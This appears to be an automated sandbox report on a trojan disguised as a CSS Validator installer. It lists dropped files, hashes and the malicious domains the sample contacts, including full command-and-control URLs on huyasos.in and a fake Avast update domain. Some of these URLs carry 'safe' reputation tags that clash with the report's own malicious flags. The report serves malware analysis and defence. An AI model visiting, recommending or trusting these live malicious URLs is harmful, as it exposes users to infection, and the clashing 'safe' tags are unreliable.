https://get.updates.avast.cn/sreamble/L9cG8Vo2GQztGm0qovd/ps29AL3_2BtYxlbeUwyhe0/qJy1kBhZdmLJX/23gke	0%	Avira URL Cloud	safe
http://www.mega-nerd.com/libsndfile/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
huyasos.in	185.98.87.196	true	true		unknown
get.updates.avast.cn	unknown	unknown	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://bitbucket.org/Coin3D/	audiodent.exe.4.dr	false		high
https://get.updates.avast.cn/I	audiodent.exe, 00000009.00000002.523746525.0000000007BDF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://huyasos.in/sreamble/1Cy_2BOoNkPfZNI/cBFrvY8_2BuNL_2FRI/EvMKECOy8/d_2Bs3isSO64yzYzMTFW/VpmMJy	audiodent.exe, 00000009.00000002.523791607.0000000007C02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_Error	yRqHWQ91dT.exe	false		high
http://apache.org/xml/UnknownNSUCS4UCS-4UCS_4UTF-32ISO-10646-UCS-4UCS-4	audiodent.exe, 00000009.00000000.279173277.00000000011AD000.00000002.00020000.sdmp, audiodent.exe.4.dr	false		high
https://bitbucket.org/Coin3D/error	audiodent.exe, 00000009.00000002.521033898.0000000001048000.00000002.00020000.sdmp, audiodent.exe.4.dr	false		high
https://www.thawte.com/cps0/	530d7c.msi.4.dr	false		high
http://www.grsoftware.net/downloads/grbackpro/grbakpro.pdf	ReadMe.txt.4.dr	false	Avira URL Cloud: safe	unknown
https://www.thawte.com/repository0W	530d7c.msi.4.dr	false		high
https://github.com/ericsink/SQLitePCL.rawX	SQLitePCLRaw.core.dll.4.dr	false		high
http://apache.org/xml/messages/XML4CErrors#FIXEDEBCDIC-CP-USIBM037IBM1047IBM-1047IBM1140IBM01140CCSI	audiodent.exe, 00000009.00000000.279173277.00000000011AD000.00000002.00020000.sdmp, audiodent.exe.4.dr	false		high
https://www.advancedinstaller.com	530d7c.msi.4.dr	false		high
https://www.grsoftware.net	ReadMe.txt.4.dr	false	Avira URL Cloud: safe	unknown
https://huyasos.in/	audiodent.exe, 00000009.00000002.523718501.0000000007BD4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/ericsink/SQLitePCL.raw	SQLitePCLRaw.core.dll.4.dr	false		high
http://nsis.sf.net/NSIS_ErrorError	yRqHWQ91dT.exe	false		high
https://github.com/ericsink/SQLitePCL.rawF	SQLitePCLRaw.provider.e_sqlcipher.dll.4.dr	false		high
http://www.grsoftware.net/home/buynow.html	ReadMe.txt.4.dr	false	Avira URL Cloud: safe	unknown
https://huyasos.in/sreamble/1Cy_2BOoNkPfZNI/cBFrvY8_2BuNL_2FRI/EvMKECOy8/d_2Bs3isSO	audiodent.exe, 00000009.00000002.523890285.0000000007F5B000.00000004.00000010.sdmp	false	Avira URL Cloud: safe	unknown
https://get.updates.avast.cn/	audiodent.exe, 00000009.00000002.523746525.0000000007BDF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://get.updates.avast.cn/sreamble/L9cG8Vo2GQztGm0qovd/ps29AL3_2BtYxlbeUwyhe0/qJy1kBhZdmLJX/23gke	audiodent.exe, 00000009.00000002.523746525.0000000007BDF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://apache.org/xml/messages/XMLValidityWINDOWS-1252XERCES-XMLCHhttp://apache.org/xml/messages/XML	audiodent.exe, 00000009.00000000.279173277.00000000011AD000.00000002.00020000.sdmp, audiodent.exe.4.dr	false		high
https://groups.google.com/forum/#	audiodent.exe, 00000009.00000002.521033898.0000000001048000.00000002.00020000.sdmp, audiodent.exe.4.dr	false		high
http://www.mega-nerd.com/libsndfile/	audiodent.exe, 00000009.00000002.521033898.0000000001048000.00000002.00020000.sdmp, audiodent.exe.4.dr	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.98.87.196	huyasos.in	Russian Federation		205840	VM-HOSTINGRU	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	508840
Start date:	25.10.2021
Start time:	17:05:27
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	yRqHWQ91dT (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/22@3/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 38.5% (good quality ratio 37.4%) Quality average: 80.1% Quality standard deviation: 25.8%
HCA Information:	Successful, ratio: 55% Number of executed functions: 66 Number of non-executed functions: 76
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 13.107.42.16, 13.107.5.88, 20.82.210.154, 40.112.88.60, 80.67.82.211, 80.67.82.235, 23.203.78.112 Excluded domains from analysis (whitelisted): client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, e15275.g.akamaiedge.net, arc.msn.com, e12564.dspb.akamaiedge.net, config-edge-skype.l-0007.l-msedge.net, wildcard.weather.microsoft.com.edgekey.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, l-0007.l-msedge.net, config.edge.skype.com, fs.microsoft.com, afdo-tas-offload.trafficmanager.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, tile-service.weather.microsoft.com, e1723.g.akamaiedge.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, l-0007.config.skype.com Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:06:47	API Interceptor	2x Sleep call for process: audiodent.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
huyasos.in	OfsNSr9oYp.exe	Get hash	malicious	Browse	95.181.178.82
huyasos.in	W1qNIM5mQL.exe	Get hash	malicious	Browse	95.181.178.82

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
VM-HOSTINGRU	installer.exe	Get hash	malicious	Browse	185.98.87.179
	0Xe1Rmpae5.exe	Get hash	malicious	Browse	185.98.87.65
	MtYLiiai45.exe	Get hash	malicious	Browse	185.98.87.65
	wVVTcS6zyZ.exe	Get hash	malicious	Browse	185.98.87.149
	_00541_Purchase Order_.xlsx	Get hash	malicious	Browse	185.98.87.149
	Hlxj8nfBay.exe	Get hash	malicious	Browse	92.242.40.244
	cpMHTTwNC1.exe	Get hash	malicious	Browse	92.242.40.244
	report_11.20.doc	Get hash	malicious	Browse	92.242.40.104
	report_11.20.doc	Get hash	malicious	Browse	92.242.40.104
	report_11.20.doc	Get hash	malicious	Browse	92.242.40.104
	New Price Quotation.exe	Get hash	malicious	Browse	92.242.40.195
	Canon Invoice - SG191009 & SG191008-pdf.exe	Get hash	malicious	Browse	92.242.40.195
	BANK_TT_PDF.exe	Get hash	malicious	Browse	92.242.40.195
	SWIFT MT103 MIDLGB31.exe	Get hash	malicious	Browse	92.242.40.195
	P117_881_pdf.exe	Get hash	malicious	Browse	92.242.40.195
	T8823_pdf.exe	Get hash	malicious	Browse	92.242.40.195
	SC-08453.exe	Get hash	malicious	Browse	92.242.40.195
	Revised PO 106622.exe	Get hash	malicious	Browse	92.242.40.195
	6FmrsohIP6g8w7i.exe	Get hash	malicious	Browse	92.242.40.195
	jkZKRSpFycGYr28.exe	Get hash	malicious	Browse	92.242.40.195

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Windows\Installer\MSI14BC.tmp	o4c8AUtX1g.exe	Get hash	malicious	Browse
C:\Windows\Installer\MSI14BC.tmp	farcry6_repack.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Config.Msi\530d7b.rbs Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	11078
Entropy (8bit):	5.746451563704331
Encrypted:	false
SSDEEP:	192:XYW1elYlxwrGBkmAnQZorAWax08RkpzTX344OL4B0eqsfn8cEYHsfn8cEY4nRS6J:XYUeljAWax08RkpzTX344OL4BnfnihfY
MD5:	1B30CF4F480C59E05A5C1540289760CA
SHA1:	37786DEA0D2A951B5DFAE6E02652EDF272AD9C19
SHA-256:	94BC18376E4915500F830DEBC436AA330A44346526D28634BA250794286B2FF3
SHA-512:	9D5D00651E068DAF9551F60BDB301C7D3A7CDFBD55574A1E81805A7CF532166CC3486623E99D789ECE10439BA72DF3B7041B4566646BF3B6A4DD742CA0638AC9
Malicious:	false
Reputation:	low
Preview:	...@IXOS.@.....@.YS.@.....@.....@.....@.....@.....@......&.{8C4E8105-89CF-42DC-B547-B756AB6C9EC5}..CSS Validator..CssValidator.msi.@.....@.. ..@.....@........&.{2E68BFCA-136D-489B-99E7-02370AE416AC}.....@.....@.....@.....@.......@.....@.....@.......@......CSS Validator......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{BACEFD7C-2242-4BDA-88CA-278EA0FBAC71}&.{8C4E8105-89CF-42DC-B547-B756AB6C9EC5}.@......&.{E1F4536E-7D2A-4F44-81EE-727B5F105E80}&.{8C4E8105-89CF-42DC-B547-B756AB6C9EC5}.@......&.{834EA0BB-8035-4ACB-9366-174CC245FFAC}&.{8C4E8105-89CF-42DC-B547-B756AB6C9EC5}.@......&.{F40562C3-E5CF-4975-B128-0CB43DBE0174}&.{8C4E8105-89CF-42DC-B547-B756AB6C9EC5}.@......&.{C321E67B-035D-49DD-B4D5-4B5285D7B97D}&.{8C4E8105-89CF-42DC-B547-B756AB6C9EC5}.@......&.{7F85F72B-E3A4-4884-A6D2-F057681DC710}&.{8C4E8105-89CF-42DC-B547-B756AB6C9EC5}.@......&.{572BD592-23BE-4219-874A-9F3CC4AB9FEC}&.{8C4E8105-89CF-

C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp\CssValidator.msi Download File
Process:	C:\Users\user\Desktop\yRqHWQ91dT.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {2E68BFCA-136D-489B-99E7-02370AE416AC}, Number of Words: 10, Subject: CSS Validator, Author: Hemoco bvba, Name of Creating Application: Advanced Installer 18.7 build 0a7fdead, Template: ;1033, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Category:	dropped
Size (bytes):	7775232
Entropy (8bit):	7.95100555954072
Encrypted:	false
SSDEEP:	196608:rY7cfmLhGlwa2wQiXAytyTCpj59zHpmzSTnUT4R+:rY7cfmLYwMQiXAytJ55gzSTw
MD5:	4C0F425E456ED7904F1B207FAD617EBE
SHA1:	56304F5446B7DB91314E252143E59353072A6F28
SHA-256:	A14D402C30E55AC43A83596A1D2832A730A7EB3A056E9420AC725B0EF02A176A
SHA-512:	C9AD2C0B0EBF21F7D683026689429DEF5BC5AA8DE2B3778CB1B84259CF920BF8506A55080BF7B292BE9D37C0B37398802F438C183046C0ECF6CF70D3BF396D35
Malicious:	false
Reputation:	low
Preview:	......................>...................w...................................C.......~...............................q...................................................................................................................................................................................................................................................................................................................................................................................................................;...............#...2........................................................................................... ...!..."...,...$...%...&...'...(...)...*...+...0...-......./...3...1...:...>...4...5...6...7...8...9.......<.......=...f...?...@...A...B...........E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\LICENSE.electron.txt Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1060
Entropy (8bit):	5.127745905239685
Encrypted:	false
SSDEEP:	24:lDiJHxRHuyPP3GtIHw1Gg9QH+sUW8Ok4F+d1o36qjFD:lDiJzfPvGt7ICQH+sfIte36AFD
MD5:	F8436F54558748146EC7EBD61CA6AC38
SHA1:	EF226E5B023D458EFCDC59DC653694D89802F81C
SHA-256:	34F6F27C26D1BB8682EBB42AE401F558228FD608455BD7C6561D5FD500B7D05B
SHA-512:	5B310B48BBEE286F03E645E4BFAD0EC870A7C68C445D54F46F3EAAA9C427F9DE6CD0561D451838BD53C78A5289E9F0BDA19CDA4257A4657580AFA6C357913050
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	Copyright (c) 2013-2019 GitHub Inc...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION.WITH

C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\License.txt Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	3319
Entropy (8bit):	4.74915258074069
Encrypted:	false
SSDEEP:	96:mFc2eAg2pZGQlvzRCyLiqxt2X3I8Si0mebrSv:zfAgmrRhL4I8SiWbrSv
MD5:	CBD32695674DCFBA5C4609DEFCAFDF55
SHA1:	6F5C934CB49845AF6B59683544A95A7E4B515DCE
SHA-256:	2568688DD3418B21FD0D4CD416C1A759DE9DAE759E192BCCF834D3EC2E1E7F2C
SHA-512:	AE430B2FEE5864BB4130C44C26A90A2053B098C4E783AD0AD9C587B3E4FD1A38E7AD5D87C5AF6E598ED7D1A6A766F104B4C07599FCD282248E655FFBAC2C2668
Malicious:	false
Reputation:	low
Preview:	END-USER LICENSE AGREEMENT FOR GRSOFTWARE SOFTWARE GRBackPro.....IMPORTANT - READ CAREFULLY: This GRSoftware End-User License Agreement is a legal agreement between you (either an individual or a single entity) and GRSoftware for the GRSoftware product identified above, which includes computer software and may include associated media, printed materials, and "online" or electronic documentation ("SOFTWARE PRODUCT"). By installing, copying, or otherwise using the SOFTWARE PRODUCT, you agree to be bound by the terms of this End-User License Agreement, do not install or use the SOFTWARE PRODUCT; you may however, return it to your place of purchase for a full refund.....SOFTWARE PRODUCT LICENSE....The SOFTWARE PRODUCT is protected by copyright laws and international copyright treaties, as well as other intellectual property laws and treaties. The SOFTWARE PRODUCT is licensed, not sold. You may not rent, lease, or lend the SOFTWARE PRODUCT. You may permanently transfer all your rights under

C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\ReadMe.txt Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	ISO-8859 text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	20212
Entropy (8bit):	4.793794798262899
Encrypted:	false
SSDEEP:	384:DtfgszUGxVnoOxazTGExOrDDDuUMOT4SsWv:xLxVnoVzTG3kk4E
MD5:	8EB0D56C86DA3080CFE2F9BAB6D6318C
SHA1:	A63256C40D34B844D2DB2F2DFB2A6C068F2F1E19
SHA-256:	091CBA047A79B4BE6A10FF265153D44C8474CC24FBC0B9C17775F481738AE8DD
SHA-512:	12E15DE204C2EDF2AB4D57E2A35D96DC2D6296079EC1C86CEAAA7510336F9C57CC833C10EE50F592797C700DD729D3076065523FFB83B0DEBA5B872BD4EED249
Malicious:	false
Reputation:	low
Preview:	Distribution Summary..~~~~~~~~~~~~~~~~~~~~~....GRBackPro: Professional backup for Windows 10/8.1/8/7/Vista/XP ans Windows Server 2019/2016/2012/2008/2003 v9.3.x..Release Date: 19 October 2021..Categories: backup utility, file utility, system utility..Supported Platforms: Win10, Win8.1, Win2019, Win2016, Win2012, Win8, Win7, Win2008, Vista, Win2003, WinXP....Description..~~~~~~~..GRBackPro is a professional Windows backup program that helps you maintain your..vital computer data. It can re-create your source folder tree onto the..destination drive (or a single compressed archive) and for every folder it can..copy your files or create a PKZIP. compatible compressed archive with long file..name support and password protection. You can run a full, incremental or..differential backup of your files. You can synchronize your backup..files/directories with your sources. You can easily restore all or just some..files to either the original source or to a new location. You can define..multiple b

C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\SQLitePCLRaw.batteries_v2.dll Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	5120
Entropy (8bit):	4.288309221167179
Encrypted:	false
SSDEEP:	48:64+lYpBBasD07Nf4yBrl/KckU1N4zOuS0GiWekJWC27fSMBBhAA+vnaOLhWLsnO/:yOalx/lCcXYz1S0Gx7i7zHAA+CO/I
MD5:	E3DDBE5680FAD01D0E5B7B963181BC06
SHA1:	BECCE75CDA9222511E9F8D480B145CE6C24A6CCF
SHA-256:	07A2736DF9434B0FBBC5C441A76726CA66EB21554622B5F09D797EA01DF9F0C7
SHA-512:	055E2AE9079B2CB8DE58F01CA19C8561C21349406186A1E884765AA074C57740E7E6C4A43C3E4A939F1316F4D8114671032D76F61DEB9B0C7BEB9C1D10076579
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f..........." ..0..............)... ...@....... ..............................j.....`..................................)..O....@..`....................`......\(..T............................................ ............... ..H............text........ ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B.................)......H.......d ..x....................'.......................................(.....s....(.....BSJB............v4.0.30319......l.......#~..L.......#Strings............#US.........#GUID.......`...#Blob...........G..........3................................................6.m.....m...s.Z...............q...........V.............................Y...........8.1.....1.....1.....(...............1.9...........1.9.....P ............W ..............T.....T.....T...).T...1.T...9.T...A.T...

C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\SQLitePCLRaw.core.dll Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50688
Entropy (8bit):	5.803306723899389
Encrypted:	false
SSDEEP:	768:DQPUEF4XAR8QTqUp6H1Y1wDUmydr8wqlUUUUaeoJdFUUUUUUjIM5UUUV/NLF44vQ:HXAR8QTqUpC91ydLJdr8dbhi1FLsu
MD5:	358BF09045A59A1B85ACD9BC0A592904
SHA1:	53CF59D7B192F570D528B4D5C72DFA7AC25E1D7B
SHA-256:	6BE5D612830990F4185DEA66B4BAABE191D641A3A97E081A2F62FBADF2AF5B0F
SHA-512:	8E99956FAEDD57E83FB46CC2DE6D241BE9ED6B0A6967B00F7518FF461D28DBB67A3B00CB8ED22981A635E0688B53C79A507F4D92AF88F9F290980AA0BEF5B555
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....{..........." ..0.............N.... ........... ....................... ............`.....................................O.......0...............................T............................................ ............... ..H............text...T.... ...................... ..`.rsrc...0...........................@..@.reloc..............................@..B................-.......H.......0@......................p.........................................(......(......(...........Z~....,..oA...&.............b~....-.r...ps....z~.....(#...o7....0..........(#......o8.....(....Q6.(.....(%....0..........(#........o9.....(....QR.(.......(....('...:(#......o>...N.(.....(.....()...2(#....o:...2(#....o;.....o......o....2(#....o<...2(#....o=...6(#.....o.......0..........s ......}"....{"...-...+....!...s.......(1...6(#.....o....6..(....(3..

C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\SQLitePCLRaw.provider.dynamic_cdecl.dll Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	61440
Entropy (8bit):	5.551074874821588
Encrypted:	false
SSDEEP:	1536:/RzZVISfvupRJ5d82N40duRlYy33r7HfrmYs0c6mRFgDJ8pYeFU6yTaM/eT72VmH:Zc5wAJlMq
MD5:	6A5E8F425D04F3BC66360F2BF07688A4
SHA1:	E7627232FD39730D90F11D979F1DAC6356A5244A
SHA-256:	2A45581E2ED65CAE497A199A56F311FA08B3D8C1B777E936F15D04D0B96923D1
SHA-512:	06FC1C49B40EDD398AB81505E906065D3C9B52782F7E310A71CB17FF27E5521249A6CA81E18E1A546186308CC872EB4A28ACB120D055A04B31850BEC1642D8E6
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0............" ..0.............Z.... ... ....... .......................`.......n....`.....................................O.... .......................@..........T............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................9.......H.......4E..$...................X.......................................6.......(.....~....F~H......o\|......N........s....o...+..0............(........~......o.....0............(........~I.....o.....0..%.........(..........(........~J.......o........0..H.........(..........(........~K....o.............(....(.........{........o....2~#....o....2~"....o....2~F....ot...6~G.....ox...:~H......o\|...2~$....o....2~%....o....>.(.......o.......0..N........,........s.....

C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\SQLitePCLRaw.provider.e_sqlcipher.dll Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.68164166116722
Encrypted:	false
SSDEEP:	768:nL++D20WXYjIzkPkPhh55Rru026caYscRZyQ5yuyc8VqaVYDRY1YXojnKLkI+lIG:a+S0WXYjIzkPkPhh55Rru026caYscRZK
MD5:	B7102F54D13AF5F4B66B12692DDE2D51
SHA1:	8A5619C2AA731AACF9D83EAFF3133FE0C63659DB
SHA-256:	C6CB095CEA1A39307A0579E9EC7C7D7161D04E88A245476417FE0C7D12A9B85E
SHA-512:	3577B57CA1656D0D939BF7A03F0D7D0A86C8797B57900F42690F83704681C7FDDA0919158011C29EBEA1AA66E53A28252CEFA15C84A8E32DF9E2EC41C128C433
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C.4..........." ..0.............2.... ........... ....................................`....................................O.......................................T............................................ ............... ..H............text...8.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........2...w..................0........................................r...p2...(.......N........s....o...+....0............(........(........0............(.........(...........(.......0..>.........(.........(........(...........(....(.........{.......o5.....(......(......(...."..(....&...(......(......(....>.(.......o........0..I........,........sl.......s.....+......s.......(................(.........o........0............(.......(....2.(....(........0..

C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\Typography.GlyphLayout.dll Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	27648
Entropy (8bit):	5.565938052019052
Encrypted:	false
SSDEEP:	768:W8cd6x5pyqNfNbttXqLYIA69kP2ulg4Q:WAx5p7fdXqLYIv9kPK4Q
MD5:	3301FD842AC418CF18BC96FA52D2D497
SHA1:	80B32039DF1C2439046DFCB30120D7BE8FACEAAB
SHA-256:	91CA98A59CE9B3347F6F23A0C52C714C4E56AE862956D9465E12E6D07EF87CD6
SHA-512:	051F218D9120F2E3D3E19301B73BF3D4FA0582456C032D6A3C2A05435754907092C41352B3EA9B2228A599081EFD87BF7D32633D87ADFEBB197D5A1B265BC15F
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.........." ..0..b............... ........... ....................................@....................................O.................................................................................... ............... ..H............text...$a... ...b.................. ..`.rsrc................d..............@..@.reloc...............j..............@..B........................H........>...@............................................................(....^.(.......5...%...}....:.(......}....:.(......}....>..}......}....~..,..(....+..}......(....}....R.{....-..{........F..2.. ..../........0..L........(....-..o.........o....%..(.....%..(.....%..(.......(........b...b`..b`.`.0...........(......( ...(!.......io"...2.{....(....2.{....(......o#...,...{.....{....s~....(......{....o$.....}.....{....o%....{....o&...*..0..B........{.....o'...

C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\assets\goal_achieved.png Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PNG image data, 889 x 886, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	104621
Entropy (8bit):	7.961279215007163
Encrypted:	false
SSDEEP:	1536:aEdO/Zg43pJQup/9SUe/73fYcBHLV1fqlABxM2urRCGYnf0qYtWZX2ywtgV2/ug1:aEOW4jI5/7AcBHLV9qgxc3chb424H1
MD5:	A2B879334ED0DED12343695E26E30554
SHA1:	581DCF49F959F35B13A71705B917A61658BD7836
SHA-256:	ECDBDF4A3A32936E79327FD7CA276340E89960CCB6CAA665A27BBB8EA774C83D
SHA-512:	2050065D7D4EADEBD7814E76A18039FECF6C93AE5D145777761CAA452CBE3C7C4D7122EC709F60990254D2A4F4CFF3DD0774A9FDCA08C5AA8BD4C40D7A087FF0
Malicious:	false
Preview:	.PNG........IHDR...y...v.....D.@.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.w..gv.....0. '.....,w.AKz.[.kI..jW.K.....H..$9.....)..RI.l..OZ..#......4...L.ynN.....h.. .wnx~U/.owc.N...y..-!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!.e.R.!...7n.m?q..!KYY.d2Y_RR......W....q...nA.V"..Vj...z....e...X,.~Nb...Sh..>..4..,....t.]...+`..sU.!.0...B...1...o....j;V+.lh. ..,.X..-G[.V...<.nn...?.......S.a..VLP...R"..."...X...`}..o....]v....g.Z..z.m..SW.o.p......B.).yB.Q$@X.d._{.eh..n.9.8...4+.y......h%..o\.A...Z.W`..v..D.B`x..`.~..... K.t......b.m..n.B../..<........].q.X.l6.......m.g?...={......B.!..u.B.Q`.....s..5h.r.:...F.....Hk@s....B.Q........TD..#s.lc:&....%...;.D..{..,%....8.2.!..6.cX..h\g..4..........Ha..a...3X.).....&!.{..y...B.....B.<.....f$.\5x..W...E.S.q<..b..-.L!GqF!g..%._..]X.".....3.G.g.@X,..V.c.A.M...6K../8..[F.iL.c...........0..!.e........E.4......E.1a..\..h~S..x..q.[......B......B.......N.........i.*.....).,h.p.X.

C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\assets\goal_progress.png Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PNG image data, 1024 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	66444
Entropy (8bit):	7.695795199213902
Encrypted:	false
SSDEEP:	1536:/og6riWZ+mPCTR4dEWsEbr22JCziI9fWvWBkAXQqj0DgUB62rBcUWD/:l6pHKT+Nm2kDfW0jgI08UU2ru9D/
MD5:	3559215A74E795F065A0EBA888FAB63E
SHA1:	78834C228B2BCEF9A2D22D8B407BFF1901955043
SHA-256:	8EB9852560A3E6ED0790A8B40CEDEEEFF8A39D6F2985738EC81DFE9445F61D8A
SHA-512:	9E5FD39BB5E420F2172B25E15B75ED988FBA1343925AD019D8636932DDA9B20090E2F14BA48F3E1B003EB499910E43FD5870CD122188FC8EB39684E3253A8F2B
Malicious:	false
